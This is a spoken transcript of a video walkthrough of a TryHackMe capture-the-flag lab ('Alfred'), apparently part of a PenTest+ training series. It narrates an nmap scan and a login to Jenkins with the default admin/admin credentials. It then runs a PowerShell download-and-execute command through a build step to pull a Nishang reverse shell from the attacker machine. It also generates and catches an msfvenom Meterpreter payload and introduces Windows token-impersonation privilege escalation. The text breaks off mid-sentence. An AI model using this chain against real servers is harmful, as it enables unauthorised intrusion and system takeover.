Today we're going to hack into a Jenkins server as a part of our offensive pen testing and CompTIA PenTest Plus pathways. And it's actually a cool exercise. It's a 3-step exercise. This is all going to be done on the TryHackMe platform because that's our lab environment. So if you don't have it, we'll talk about how you can get all the different tools that we're going to use for the specific hack that we're doing today. But all in all, it should be pretty straightforward and it should be pretty fun, honestly. And then from there, we'll just get the rest of it and we'll do our privilege escalation and do the complete hack and get our flags, and it'll be exciting. So let's get into the quick little overview and then we'll go into the actual attack itself. So the name of the room in TryHackMe is called Alfred, and we're going to be exploiting Jenkins to gain initial access, then escalate the privileges by exploiting Windows authentication tokens. Not exactly sure why it's called Alfred. Maybe somebody in the comments will enlighten me, or maybe something in our room contents will tell us. But if you have never watched Batman, then you don't know who this character is. And this is from the animated series, which is, in my opinion, the best version of the Batman stories, because I mean, the guy who did the voiceovers for Batman himself and the guy who did the voiceovers for the Joker from this series are the most epic. If you know, you know. And if you can drop it without Googling it, then you're definitely one of the cooler cats. But unfortunately, the guy who did the voice of Batman has passed away. And the guy who did the voice of Joker, it's Mark Hamill. Okay, I'm just going to say who that is. I didn't even know that it was Mark Hamill. When I found out that it was Mark Hamill, I lost my mind. Anyways, I'm nerding out a little bit, but I like this image sent me down memory lane. It was like a very nostalgic image for me. So anyways, in this room, we'll learn how to exploit a common misconfiguration on widely used automation server called Jenkins, and it's used to create continuous integration, continuous development pipelines that allow developers to automatically deploy their code once they made changes to it. That's kind of what I said. So I did understand it a little bit. After which we'll use an interesting privilege escalation method to get full system access. Since this is a Windows application, we'll be using Nishang to gain initial access. The repository contains a useful set of scripts, enumeration, privilege escalation, etc. So we'll be using the reverse shell scripts from Nishang, and this machine that we have does not respond to ping, so we don't need to do that. So and then that's it. We're just going to dive right deep into it. So that was the initial kind of introduction here. And then we have the switching shells and in privilege escalation. It's only 3 tasks. So this should be relatively straightforward, and hopefully it won't be too long of a video. And hopefully on my side, as I recorded, it won't be too crazy either. But that's pretty much it. And we're just going to kind of dive deep into it. So a quick little note from Hackaholics Anonymous. And then by the time you see that, I'm going to have Nmap up and running so we can do our scan. And then we will get the questions answered. So quick little note from Hackaholics Anonymous, and then we'll get into it. If you want access to my notes and exclusive downloads and to get lifetime access to me on Discord, consider joining Hackaholics Anonymous. We have 4 tiers. We have the supporter, the agent, the guardian, and the master. Each tier gets their own Discord server and early access to content. The agent, guardian, and master levels get exclusive content, exclusive downloads, monthly Python automations, live streams with me every single month, plus so much more. And to join, you can simply click the link in the description below and you will be able to choose the tier for which you want to join. I really hope I see you in the Discord chats. If not, I hope I see you in the comment section. All right, so the first question says how many ports are open, and we want TCP only ports. So this is the attack box, just to kind of give you a rundown of how I'm setting up my lab environment. So this button right here, this blue button that you see right there, initially said start attack box. So I clicked that and then it opened it up in split view for me, which looks like this. And then I clicked this button right here, which was our green start machine. So this is going to be our victim machine, essentially our Jenkins server. And then the attack box is a Linux machine that we use inside of the TryHackMe environment. So that is typically the way that I approach all of these different labs. Now, I actually have Kali Linux installed on a thumb drive, and I could technically do that and connect via OpenVPN to be able to run these lab exercises, I just prefer to use the attack box that's inside the browser. You're more than welcome to use your own version of Kali Linux if you want to do that. You should be able to get the same results that I get as long as you actually have access to the tools that we're going to end up using. So it's completely up to you what you use for your attacking machine, but the victim machine will end up being this button right here. So no matter what, it'll be this button right here. Now, if you want to do this against another Jenkins server because you don't have access to TryHackMe, then you can actually download and install Jenkins and then use that as your victim machine. You can do it on a bunch of different cloud providers, or you can do it through just downloading the server itself and then turning one of your computers into the server if you have access to multiple computers. So there are a lot of different ways to launch Jenkins. But my preferred way, and this is one of the reasons why I use TryHackMe, is that everything comes kind of out of the box ready for me to do. So it's my way of doing it. So it's totally up to you. If you're tight on a budget, I completely understand. You can go ahead and just download Kali Linux for free, install it, and the Linux Plus playlist has the instructions to do that. So it's in the first video, section 3. Walks you through all of the different ways that you can install Kali Linux. And then if you want to just use Jenkins yourself, you can also do that through a variety of different methods and even for free. So totally up to you. I prefer to pay the little 12 bucks or 14 bucks, whatever it is, to actually have access to TryHackMe. But that's just me, and this can be done in a variety of different ways. Okay, so that's my lab setup. Is I'm using TryHackMe, and we're using the attack box right here. So we're logged in as root, as you can see, and we need to go ahead and scan our Jenkins server, which is this IP address that's been provided to us. So there we go. So we're going to just go over here and we're going to run nmap. Really, that's pretty much it. So pn is to avoid pings. Actually, so let's do this, right? So I'm going to do man nmap just so we can run through this. I should be doing this more often in case people are not familiar with this, but this is the manual for nmap, and all of the various options and the use cases and everything for nmap are inside of this manual. So it's actually very handy, and there are a lot of different ways that you can use nmap. So pn right here, the option right here, it treats all the hosts as online and it skips the host discovery, which is essentially saying it's not going to ping the host because it can't ping the host because the host will not respond to pings. Basically, that's what it says. And then what we're going to do is we're going to use a few other different options to get some more detailed information about the ports that we're scanning, right? So I'm going to do the SV, and it should be, I think it's under service version detection. There we go. So I'm going to use SV to find the various services or version info of the various ports that are open. And I'll do O as well to find the operating system that will be running on it. And I want to say it's under OS. There we go. OS detection. There we go. So enables OS detection. So those are going to be the two key options that I'm going to use with this, as well as the PN option. And I'm just going to first run it on the first 1,000, or the top 1,000, I should say, because there are 65,000 ports that are available, and I don't know if I want to be doing that on all of them. So my whole thing is, if I can get the answer by running just the top 1,000 ports, then excellent. If not, then I'll just run the scan again, and we'll do all of the 65,000 ports. So if you don't designate which ports you want to scan, automatically nmap will just scan the top 1,000. And this last portion right here, -VV, is for very verbose, just so we can get a bunch of extra details as the scan is running. So if you don't do VV, none of these things that you see right here will actually show up. It'll just run, and then when it's done, it'll give you the final report. I just like seeing everything that goes on. And then in the final report, I also end up seeing more detailed information because I did very verbose. So as it stands right now, we have 3 open ports, 3389, 80, and 8080. And then we're going to see what is running on those ports and see if there's any other ports that are open. And that should be it. And then we'll try to see if this is actually the answer. So currently we have 3 open ports, and they do say TCP on here. So let's see if you can, I think you could see that, but I'll zoom in a little bit more. So you can actually see that at the, like after the port itself, it says that it's TCP, TCP, TCP. So that is what we're looking for. We're looking for TCP ports. Now, you may already know all of this. You may already be a seasoned veteran, but I typically tend to over-explain things just in case somebody's watching that has not done this before and they don't know what they're looking for and they don't know the logic behind a lot of this stuff. So I just over-explain. So don't get mad. You know, you can watch this on 1.5 speed and zoom through all this, or you can use the timestamps below and zoom through all of this. Yeah, that's pretty much it. I'm gonna let this finish and then we'll look at the final report. You know what? Actually, while this is running, we're gonna try to get the answer to the second question here, which says, what is the username and password for the login panel? So what we can do is we can literally go here and we can say, what is the, oh my gosh, what's happening? Let's try this one more time. So what is the default username and password for Jenkins servers? That's typically where we can start. And so it'll give us the answer right here. And default username is admin. Default password could be a unique password. And I mean, it could be a variety of different things, I think. So unless we get into the Jenkins home secrets initial admin password file, unless we get into that, we won't be able to find the default password. There are a lot of different things that we can find right here. Default password for user Jenkins is just Jenkins. That could be it. There is default username admin. So there are a lot of different things that we could do. There's admin Jenkins. So there are different options that we can run, and this is still running. So let's go here and let's try this out. So if it's one of the things that kind of TryHackMe does that helps us a little bit is this stuff right here. So 5 characters for the username, so that would definitely be admin, and then it can't be Jenkins because it runs out, right? So I would try admin. Okay, so there we go. So the default username and password for the login panel is admin, admin. And then so if we go here and open up our browser and open up the browser to this IP address, which is the IP address of our Jenkins server. So if we go there and log in with admin, admin, maybe we'll get to see some interesting information about the next question down here, because it says find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it. So this would be the command. It's PowerShell, invoke expression, and a new object, net web client, download string, which is the IP and port of our machine. This would be the IP address and port of our attack box. And then invoke PowerShell top or PowerShell TCP PS1, and then invoke PowerShell reverse shell, and then IP address, etc., etc. So you first need to download the PowerShell script and make it available for server to download. You can do this by creating the HTTP server with Python 3, which is what we've done a lot. The hint button doesn't work. That's kind of annoying. But let's see. Let's see. Has this finished yet? It's still running. So it's at 87%. So it's almost ready to go. So let's see what we can find by going to this IP address. So RIP Bruce Wayne. See? Yes. They used the Christian Bale Bruce Wayne, which is very interesting. Donations go to alfred@wayneenterprises.com. Interesting. Okay. All right. Fancy. Good stuff. So we need to find a way to attack this thing, right? So what is a way that we can go into this? So first we're going to do inspect. This is always the first step, just so we can see what's going on behind the scenes of this website. And the easiest way is to first just look at the source code at the bottom right here. So if we go, let me zoom in for you. So if we look at the source code at the bottom right here, the header doesn't have any interesting stuff in it. The body has basically the JPEG file. It doesn't give us the link to it. The donations are just the email address. So nothing interesting or nothing useful really here. Console would allow us to interact with it. Debugger has nothing in here. Network usually, or where is it? Is it under network? I think it is under network actually. That is supposed to kind of show us what's going on in the background, or what the various pages are that are loaded. Maybe it's debugger or network. And then style editor, performance, memory, storage. There it is. Okay, so there we go. So we have the index database is still at the IP address, local storage, session storage, all of it is just the base IP address, and cached storage. And all of these things are very basic. So there's nothing in the source code for us. So that is first step. So let's see what the background is still doing. So this is all doing what it's supposed to do. So we're going to do GoBuster now, just to see if we can find anything else behind the scenes, because I am very curious to, whoops, I thought I was on my own computer and I did Control or Alt Tab, I guess, Control Tab. I'm on a MacBook. All right, so what we're going to do now is we're going to run the GoBuster command to see if we can find anything on this IP address as far as directories or any paths that we could potentially take to log in to alfred@wayneenterprises.com. Let's see what Wayne, I can't imagine that this would be anything but. So what is wayneenterprises.com? Yeah, wayneenterprises.com. So web page under construction. All right, so this is definitely not an active domain. I just thought maybe, I don't know, I thought maybe that it would be useful. Okay, cool. So the thought process of a hacker tells me that I need to go ahead and run a scan against the website so I can find potential domains to log into. So that would be the next thing that I would try. So what we're going to do is we're going to use GoBuster to do that. And the default command for GoBuster is to literally just call on GoBuster. I'm just curious as to where our word lists are. So if I do ls, I think it's user word lists. Is that what it is? There's no such thing. So what if we just go to user? So let's first do that. We'll go into the user. Inside of here, we have these things. And share, user share, I think that's where it is. So cd share, and then we have the word list. There we go. That's where it is. Okay. So user share word list is where they are. And then we have dirbuster, and typically inside of dirbuster is where the word list for dirbuster, where the word list for GoBuster are, and there we go. So we have the directory list, and then there's also, I think there's another one called dirb, and inside of that we have the common text file. So there's a few different ones that we can potentially use. So we're just gonna run it like so. So let me zoom in here just so you can see the command. And so it'll be GoBuster, right? And then you give it the dirb or dir, excuse me. GoBuster dir, which is the directory scan that we want to do with GoBuster. There are different ways that you can run GoBuster. So we want to use the directory scan. We give it the U, which is our IP address that we're going to be scanning. In this particular case, it's going to be this guy right here. So I will just copy that and then go back over here and we'll paste it in here. So that's going to be the IP address that we're going to be scanning. And then we give it the W for the word list that we're going to use, which is going to be user share word lists. I need to spell things correctly. Dirb, and then we will do common.txt just for now, just so we can see what we find. And it says error running GoBuster unable to connect to, oh, I see. I mistakenly used HTTP twice because when I copied it from the browser, it brought HTTP twice. So we're gonna delete that, press enter. There we go. So it has index.html. Okay, so nothing else showed up using the common word list. So what we can do is we can go to another word list that is typically more powerful. So it's the directory list, you know, these things that you see right here. So these are much larger. So we'll just do the directory list medium txt. I'm just going to copy this piece right here and we're going to paste that inside of our thing, our command. So it's going to be dirbuster, and then we're going to paste the full path of that directory list. There we go. And let's see what that does. So this is going to take a little bit longer because it's scanning through more options, and hopefully it'll give us something. Now, while that's running, we actually have this answer that should be done because the nmap scan just finished and it gave us a bunch of information. And basically, there are 3 open ports. So it scanned everything else, but it has 3 open ports for us. Port 8080 has the Jetty, etc., etc. So that would be the port that will most likely hold our option here, because Jenkins, I believe, belongs to Jetty, right? So if we do this, who or what company owns Jenkins server, right? I think it's Jetty. CloudBees, maybe not. Or I feel like it's Jetty, the thing that we're trying to go for. What is, let's see. So what's the next question I would ask? What is Jetty? This is definitely not the question. So why don't we do this? Instead of doing all of that, we could do this, right? We'll copy this guy. Oh, whoops. We'll copy that. Go here and then do this. And that should give us a little bit more information. It's not a specific official stable version of Eclipse Jetty web server, rather it's development version string, snapshot of the ongoing development, Okay, so Jetty is a web server by itself. It's definitely not Jenkins. And then the response that we got right here is nothing. So, okay, so definitely maybe not GoBuster. So, okay, so let's just look at the different ports that we have open, right? So we have 3 different ports open in the background. We have 80, 3389, and 8080. Now 80 will bring us back to this server because that's basically the default port for HTTP. So we'll do 8080, and 8080 takes us to Jenkins. I knew it. Okay, so there we go. So admin, and let's try logging in with our default username and password here, and let's see if that lets us get in here, because that would be pretty handy. All right, when we log into Jenkins for the very first time, this is the home page, the dashboard that we're going to land on. There's already a project that has started for us, and we can essentially just mess around with this project. And you can type in commands into here and press build now, and it'll just run it. So you can see that there were empty commands. I just clicked build now a couple of times, and it just added this number 2 and number 3 right here on today's date, November 1st, as I'm recording this. So it's actually, yeah, it is November 1st. Holy cow. All right. So yeah, so essentially whatever you type in here, you click build now, and it'll start working on whatever that command is. Now in this particular case, I don't have anything, right? So I didn't put anything. So my last build is empty. There were no changes made to it. It's just an empty build. So we can go back to the project and we can input whatever we want to run it. Now to run it, this is the command that they're telling us that we should be running, right? So the PowerShell, IEX, etc., etc. You will find this feature. You can use it down the command to get a reverse shell on your machine and then run it. You first need to download the PowerShell script and make it available. So I'm curious if it's already been downloaded for us. If it has, amazing. If not, then I need to also download it. So I'm going to do I will actually just do this. I'm going to search by the name, and then I'm going to search by the name Nishang to see if there's anything by that name inside of this computer at all, right? So it's called the Nishang to gain initial access. So I'm going to try to see if I can find anything for this here. If I do, that would be amazing. If not, we might have to download it. Okay, so there are a bunch of things that actually exist with the word Nishang in it, but it's not what we're looking for specifically. We're looking for the reverse shell scripts that are available here. So if I open it up just in my own computer, we can see that these are the shell scripts, right? So the invoke PowerShell TCP PS1. This is the thing that we actually are trying to use. So I'm going to copy this and go inside of the browser of our attack box, and we're going to go paste it, and we're going to just download this specific script into our attack box. So we have the Nishang, as you can see, and everything else. So I'm just going to go right there, click on this lovely little button, and it's going to download the invoke PowerShell TCP PS1 script for us. Okay, great. So now we have the script that we need, and I want to say that it's going to be like in the root downloads, right? So yeah, it's in the root folder, and there it is. So if I go back to this specific window and we do an ls, this should already be here. There it is. Wonderful. Okay, so we have our PowerShell script. Now, the command that we're trying to run is this whole shebang right here. And this actually refers to the invoke PowerShell TCP PS1 right here that is trying to download from our computer. So what this is doing right here is that it's going to reference this download string that you see. It's going to reference the IP address from our attack box. So I need to put an IP address for the attack box and a port number for the attack box that I will have to launch using the Python M3 server, right? And then from there, it'll refer to this invoke PowerShell, try to download that onto the Linux or on the Jenkins server. And then from there, it'll invoke the PowerShell TCP command right here and try to connect to our actual attack box. So we're going to be doing two things, right? We're going to essentially have two extra windows open in addition to this window. There's going to be a netcat listener window because we're doing a reverse TCP shell. And then there's going to be a Python window that's going to provide this thing as a download for us. So it's going to be Python 3 m http.server, and then we'll do it on port, I guess 8080. It doesn't really matter because it's our machine that we're doing it on. So from our attack box, which is this IP address, right? So let me actually cancel this out because just in case you're doing this on your own computer, I want you to be able to know how to go ahead and run this whole thing. And actually on my particular case, the IP address is right here anyways. So that's kind of easy. So if I just do ifconfig, and on all Linux or Unix machines, it's ifconfig. If you're on a Windows machine, it would be ipconfig. And then so you have the Docker, which is not what you're looking for. And then you have the LO, which is either for local or loopback. I always refer to it as the local, but it's the 127.0.0.1. This is also not the IP address you're looking for. This is the one. So ENS5 is the actual interface that we're running. And so it's 10.201.89.237. That's my actual IPv4 IP address. And then there's the INET6, which is the IPv6 IP address. So we're just going to be using this one, right? That's the one that I'm going to be using as I refer to my attack box here. So if I run this command again, this Python M3 server, so what it's doing right here, you see that the IP address is 0000, but it's actually 10.201.89.237:8080, right? And then on that location is where we have the script that we just downloaded. So let's do this one more time. So there's the script, right? So we have that now. Now we're going to run it. And this is what we're trying to download, right? As we run that full command. Okay, so that's great. That's that one thing. Once that downloads, so the first part of this that you see right here, this PowerShell expression, etc., everything up until this semicolon that you see. So there's a semicolon right there. Everything up until that semicolon is one command. And this first command is just a download of this script. And then after the semicolon, it's going to run a second command. So it's assuming that this first command was successful. It was able to run the script. And then it's going to run another command, which is the invoke PowerShell reverse IP address, etc. So it's going to run this second command to actually try to establish a reverse shell connection. So and on this one, we need to also provide our IP address, which is the IP address of our attack box, as well as the port number that we want to connect back to. So I'm going to copy this whole thing because I need to be able to modify it before I input it into Jenkins. So we're going to go over here, just open up a notepad on our browser here, paste the command. And so now I need to do two things. The first is the IP address 10.201.89.237. That's the first IP address that I am interested in. And I mean, it's the only IP address I'm interested in, but for the first part of it is the 10.201.89.237:8080, because that's where the script is sitting. So right here where it says your IP, this is the 10.201, I totally forgot it already. 89.237, 10.201.89.237, and then the port that it's downloading from is that 8080, because that's where our Python server is. And then the PowerShell reverse connection is this piece right here. So the IP address is our IP, so 10.201.89.237. And then the port is going to be whatever port we assign for our netcat listener. So I'll just do 4444. So now what I need to do is I need to go ahead and open up another one. So we already have this one. Let's open up the two that we have right here. So we already have this one. So I'm just going to go back to our main location, which is our root folder. And on this window, I'm going to do my netcat listener. So I will do NC and then LVNP, and then we'll do 4444. That's where that's listening on. Okay, great. So now we have that. So now we need to go to the Jenkins server. And then this is what I'm assuming. So hopefully this is going to be right the first try. But we're going to go and paste this in here. And then we're going to do build now. And let's see if that actually does anything. Okay, so we got partial success with this because we actually received a connection on our second window for the netcat listener. We actually did receive this connection, but and we can tell from here. So the issue is that it was not able to download the script, which is actually kind of interesting. So it didn't download the script, and then from here, the rest of it wasn't able to run simply because the fact that it didn't have the downloaded script. So the whole idea is that it should be able to launch that script once the connection is established. And since it is not able to download that script, then that's where the challenge lies. So we are now going to try this again and see if there's anything else. Maybe I shouldn't have done it inside the current project, maybe, which I can't imagine that would be the case because it's worked anyways. So like it did the work that it was supposed to do anyways. So we can create a brand new project potentially and try to run it that way. We'll see how it works. So I'm going to just do a new project, freestyle project, pipeline orchestration, etc., etc. So we will just do a freestyle project and then we'll call it project 2, and we will create it, and inside of project 2 is what we will run the next series of applications. So let's see. I'm just gonna keep everything by default, so I'm not gonna make any modifications to this. We're just gonna run all the defaults. So now we're inside of project 2. So if we do back to dashboard, we can see that there's project 1 and then there's project 2. So we'll go to project 2 and then we'll try to run this one more time and see if we actually can establish that connection and download the file. So let's go ahead and run it again. Okay, I think we have progress now. Yes, we do. Awesome. Okay, all right. So first I'm going to find the flag that we're looking for, and then I will run you through exactly what I did. So it says, what is the user.txt flag? And that's essentially what we're trying to find here. So I'm gonna assume that the user is going to be in our list of users. So let's go over here. So we're currently in the program files location. So we're going to go back to the root. And then from here, we see users. So we're going to go into users and we have Bruce default and public. So I'm going to say that it's Bruce. And inside of Bruce, let's go into his, desktop, I guess. And there it is. Okay, cool. So type user.txt. And there it is. There's the flag. Okay. So I will now run you through exactly what I did to get here, because we had everything right with the exception of just where we were applying. All right, cool. There it is. So I downloaded the script, right? I downloaded the script and it was inside of the root folder. And then I did the server, the Python server from this root folder. And then I started netcat listener, very similar to the last one. So these two terminals did exactly what the last batch of commands did. The only difference was where I input the command inside of our project. So when you create a project, so we'll go to the very, very top, right? You create a project. So I created this project. I go inside the project. Then we go inside of configure. And then inside of configure, there's a section called build, and we click on that. And then we essentially, once you click on build, it'll bring you to this little button at the bottom. And then this didn't exist before, right? So I clicked add build step, and we're executing a PowerShell command, which is a Windows command, right? So if you're doing a Windows batch command or Windows command, essentially, sometimes depending on the version of Jenkins, there's actually one that says execute PowerShell command. But in our case, we don't have that. We just have a Windows batch command. That's why in the command itself, it's actually invoking PowerShell at the very beginning, because we need to run a PowerShell command. Like the rest of it is actually PowerShell syntax. So we need to make sure that we're running a PowerShell command. So therefore, we have to invoke PowerShell at the beginning of the command. So essentially all I did was I did execute Windows batch command, and then it brought this button or this section for me. And then I pasted our previous command that we had edited inside of our little text editor here. So nothing changed with this. We just pasted it in here. And then we saved. So I'm just going to delete this piece. And then I clicked save at the bottom right here. And when you click save, it'll take you back to the project. It'll take you to the project dashboard right here, right? And then when you're here, then you click build now. And then you can see that it's still running in the background. So it's actually running the series of commands that were there. And once I clicked that, it took a few seconds. And then we established our shell here in the background, or excuse me, the Python server established the connection, and it actually downloaded the script that we had. And then on the netcat listener is where we established our shell, and then you already saw how I got the flag contents. So I'm going to run this one more time just so you can see exactly what I did, right? So we're going to start from scratch. I just wanted you to see the end result, and then from here we're going to go ahead and try it again, right? So we're going to go here. First, I'm going to go and just run my Python server one more time. Press that. There you go. And then we're going to go here, and we're going to run our netcat listener one more time. There you go. So exact commands are the exact same. Then I'm going to go into the project configuration, and then I'm going to click build, and I'm going to delete the old one just so we can start from scratch. I'm going to do add build step, execute Windows batch command, right? And I just wanted to make sure my recording was still going. So, and then from there, we'll go ahead and copy our previous command that we already configured that has our download string right there, that's downloading from our attack box, and it's downloading this PowerShell command, or PowerShell script, I should say. And then the next step of it is where it's establishing the reverse listener, the reverse TCP connection. So then we just go here and we paste that right here. There we go, just like that. And then we're going to save it, and it brings us back to the project screen. Then we're going to click build now. And then in the background, you see, there you go, that got downloaded. And then we go into our next terminal, and we see we have our connection to the machine. And then from there, you just kind of sift and sort through the machine until you can find what you are looking for. And that was that. So this is our GitHub script. We're good with that. So we can now click complete on all these, and we can move on to the next step, which is switching shells. So I'm just going to leave these open now, just in case we need to actually use them. And we're going to go ahead and run our next section. All right, for this step, we're going to be using Metasploit and MSF Venom to switch our shells. So it says that we're going to create a payload using MSF Venom. And then from here, we're going to run the PowerShell command inside of our Jenkins to actually download that file from our Python server. And then we're going to use Metasploit itself to actually have that reverse listener, that interpreter reverse TCP listener. And from there, we're going to run the actual command itself. So it says start the process. And so this start process is going to be, I believe, inside of Jenkins again, right? So MSF Venom is going to create the interpreter shell. This payload generates an encoded reverse TCP, etc. Okay, great. After creating this payload, you're going to download it to the machine using this. So this is the command that's going to download it into our Jenkins. And then before running it, we're going to set up the handler in Metasploit, which is that. And then that uses Metasploit handler to receive incoming connection from the reverse shell. Once this is running, enter the command to start the reverse shell, which is start process shell name exe. So this would have to be inside of our, I want to say this would be inside of our Jenkins server. So we're going to do everything. So I'm going to do this first. I'm going to create the MSF Venom in one terminal. Then I'm going to run a Metasploit. And then once we have that, then we're going to download it into the Jenkins server using this command. And then assuming that this is all good, I might be able to run the start process inside of Metasploit, or I might have to actually go ahead and do start process inside of Jenkins. So we'll see how that piece goes. So this we can just leave. I'm just going to leave the Python server open. This one I am going to also leave, because no, I think it should still be exactly the same, because technically I'm just downloading it onto the same exact server anyways. So I should be able to just use our with this shell right here. So I think I should be able to do it with this, where we just download or we do the start process shell name, etc. We should just be able to run it from our Metasploit, or excuse me, our shell, this reverse shell that we've established using Netcat. I should just be able to do start process inside of this window. So we're just going to leave these two windows open. We're going to go in a new window, and we're going to run the Metasploit interpreter, excuse me, the MSF Venom interpreter, this payload that we're going to create right here. So first I'm going to go ahead and copy this whole thing. I usually type it out. Should I type it out? I feel like I should type it out. I like typing these things out. It's just really fun for me, honestly. So we're just going to go ahead. I'm just going to open it up in a new window, and I'm going to go ahead and type this whole bad boy out. So we have the MSF Venom. Here we go. Okay, so the one piece that I was kind of confused by was which port I should use. So this one is on, this shell right here is on 4444. Since we're switching shells, I'm going to be creating the payload on 3333, but the IP address is going to be the same. So this is the IP address of our attack box. So we're creating a Windows Interpreter reverse TCP payload. The architecture is x86. The encoding is the x86 Shikata Ganai. Then the listening host, which is going to be our attack box IP address. The listening port, which is going to be 3333. We are creating an executable format, and the name of the file is going to be shellname.exe. We're going to press enter on this. It takes typically maybe like a minute to do it. And then once that's finished, I'm going to turn this terminal into the MSF console, the Metasploit console itself. So there we go. So we have it. Now shellname.exe is there. So if I do ls, it's in the same folder that we have invoke PowerShell as well as shell name, which is this specific terminal right here, right? So that's all good. And so now we're going to do MSF console, and we're going to initialize the Metasploit framework. And from that, we're going to launch the exploit of the multi-handler. And we're going to set our payload to be the Windows Interpreter reverse TCP, because that's what we created up here. See, so the payload that we created was the Windows Interpreter reverse TCP. So we need to make sure that that's the payload that we actually have in our multi-handler, and then the rest of it is going to be pretty similar. It's going to be pretty much the same as the actual payload that we created. So let's see what we can do. All right, cool. Metasploit is officially up and running, and our recording is still all good. Okay, so now what we're going to do is we're going to use the handler, the multi-handler. So we're going to go to use exploit multi-handler, okay? That just because we already know what it's called, but typically I would do a search for the multi-handler exploit, and then I would go about it, or whatever exploit I want to use, I would first search for it. But we already know which one it is that we're going to be using. So now when we go into this, we're going to I always do this. So there's a full command that they gave us prior to this. So you could have done use exploit multi-handler and then do the rest of the command automatically, which is this. So you could technically put this whole thing in there and then actually do run. And I'm not going to do that because I want to go step by step just so you can see what's up. So if I just go into multi-handler and I do show options, you can see that the payload right now is the generic shell reverse TCP. So the first thing that we need to do is we need to actually change the payload to the Windows interpreter, which is what we created our payload for, and then it was the reverse TCP. So that is the first thing. So now if we do show options again, we can see that the payload has changed to the interpreter reverse TCP for Windows. Perfect. So now we can modify the L host and the L port, which was the 3333 was for the port. So I'm going to do L port 3333 and then set L host, which is going to be our attack box IP address, which is the 10.201.89.237. And that is pretty much it. So that's what we got right here. So now we're going to run it. And that should be our multi-handler just running in the background. Hopefully it's just going to be working as appropriately as we possibly can. So reverse TCP handler is now listening. Okay, great. So now we need to go back into the Jenkins server and we need to go back into the configuration. And from here, we need to establish another command where it downloads the new thing that we just created, right? So that new Metasploit, the MSF Venom payload that we just created. So it's the full command right here, which I'm just gonna update real quick on our terminal. So we have the full command, which is, this is the thing that they gave us, right? So we're downloading the file and we're gonna change the IP address right here to the IP address of our attack box, so the 89.237, and it's listening on port 8080, so that's very important. So we need to change that to port 8080, but then the file itself is the shell name, executable, etc. So we're downloading that file, and that's basically all we're doing. So we're going to then just, I think I can even delete this other one because I don't need to run, well, I might need to run it again. So we'll see if we can do that. Or maybe I can do like a new batch of commands or something. Because I wonder if I delete this, if it'll close out this connection right here. You know what I'm saying? So we're gonna run it as it is. So we're gonna save it. And we're gonna click build now. And let's see if this actually does everything all over again, right? So I think it will. I think it's going to download the invoke PowerShell TCP PS1 again, I believe. And then, yeah, build 2 is already in progress, ETA, etc. So I need to stop build 2. That's what I need to do, is we need to stop build 2. So let's stop that. And let's see if we can go back to the project and run build 3. Are you sure you want to abort project? Okay, abort it. Pending build 2 is already in progress. There we go. So it ran it again and it downloaded the invoke PowerShell again, which means that this one should also be running right here. So let's see if it's going to also download the other piece as well, because I feel like it should be running both of those commands. But if it doesn't, then we might have to do the whole thing all over again. Meaning like establish the connection, then only go and run the next one, which it's downloading the shell, the specific shell. So let's see how this works. Okay, cool. So, all right, so this is what I did. Okay, so I first went and closed out the previous Netcat listener session that we had, which we were already inside of the machine that we had connected to. So that reverse shell, I closed it out. And then I went ahead and I started, or actually, I think I did it twice, but essentially I completely started the Netcat listener one more time, and the Python listener or the Python server was already running. So I closed out the previous project, the task that was running. So I completely started it. I didn't modify any of the commands that were running in the background, but I just clicked this X button. I made sure everything was already stopped. And then the Python server was already running, and I just made sure that I had a new Netcat session running. That was basically it. I closed the previous Netcat session, and I started a new Netcat session. And once I did that, then it downloaded the PowerShell, and then it downloaded the shell name as well. that new shell that we created. So when we go into our connection here, now we actually have the second payload that was downloaded. So this should all be good. And now we can have all of our terminals up and running. And I'm just going to drag this to the side just so we can make sure that this connection is established. So now what we're doing is we're going to run that last command, which is start process shellname.exe. So that's the one thing that we're going to do in our connection here, start process shellname.exe. And there we go, right here in our, there we go. Now we have it. So inside of our Metasploit window, because we had the multi-handler running, now we actually have the interpreter session running, which is great. So now the question here is, what is the final size of the exe payload that you generated? So I guess that's really all it's looking for. So I think it's the 73802 is the final size that they're looking for here. So let's see, 73802. Okay, great. So that was it. That's all we needed to verify, which we could have probably done before we even transferred it into our new window. But there we go, we got it. So now we have our interpreter session. So now we can go ahead and do our last piece, which is the privilege escalation element here. All right, so we're going to now read through this because we do have a little bit of reading to do for this section here. So let me zoom out. Okay, here we go. So now that we have initial access, let us use token impersonation to gain system access. Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by the LSAS executable. Think of it as an authentication process. This access token consists of the user's SID, the security identifier, security ID, the group's SID, and then the various privileges, among other things. More detailed information can be found at this link, which I believe is a Microsoft link. Yeah. So this is the Microsoft Ignite, and on the learn.microsoft.com, you can just learn more about access tokens if you want to read through that. So there are two types of access tokens. The primary access tokens and are associated with a user account that are generated on logon, right? Then there's the impersonation token, which allows a particular process or a thread in a process to gain access to resources using the tokens of another user or another client, which is known as another process. So basically, it allows a particular process to use the resources using the token of another process, hence the name impersonation. For an impersonation token, there are different levels. So we have security anonymous, which is the current user or client cannot impersonate another user client. We have security identification, which the current user client can get the identity and privileges of a client but cannot impersonate the client. Security impersonation, which is the current user client can impersonate the client's security context on the local system. And then security delegation, which the current user client can impersonate the client's security context on a remote system. So ideally, this is I think this is the best one that we would probably shoot for, where the security context is a data structure that contains users' relevant security information. So this is what we're talking about when we say the context on a remote system. The privileges of an account, which are either given to the account when created or inherited from a group, allow a user to carry out a particular action. These are commonly abused privileges. So these are the ones that are commonly abused. So the SE impersonate privilege, SE assign primary privilege, SE TCB privilege, backup privilege, restore privilege, create token privilege, load driver privilege, take ownership privilege, and debug privilege. And there's more to be read, of course, on, what is this? Oh, this is the exploit database. Interesting. Okay. So this is for the abusing token privileges. That is, there's no CVE assigned to it. This is actually really interesting. I think this is just an article is what it seems like, because I don't think there's any script or anything that's available. This is just like oh, interesting. Yeah, this is basically an article or a paper, we can call it, in the exploit database, which is ExploitDB papers 42556, if you wanted to go ahead and read that. So these are all the various privileges that are most commonly used. So now what we're trying to do is we're trying to view all the privileges using whoami/privilege, which would be on our attack box right here. So let me zoom out now so we can actually view it. Hopefully I didn't lose my connection, because that would mean I would have to do all of this work again, which would really, really just suck. I shouldn't have. I should have like the full established connection. I should not be losing my connection because my time has not run out. I really hope I didn't lose my connection. That would really suck. All right, let's see if this is let's see if this works. Okay, yes, I was kicked off, or I mean, I guess I lost connection. Not exactly sure what happened, but I had to redo everything. And this time around, it was actually, I had to go through so many trial and error because, so just in case you go through it, right? So this 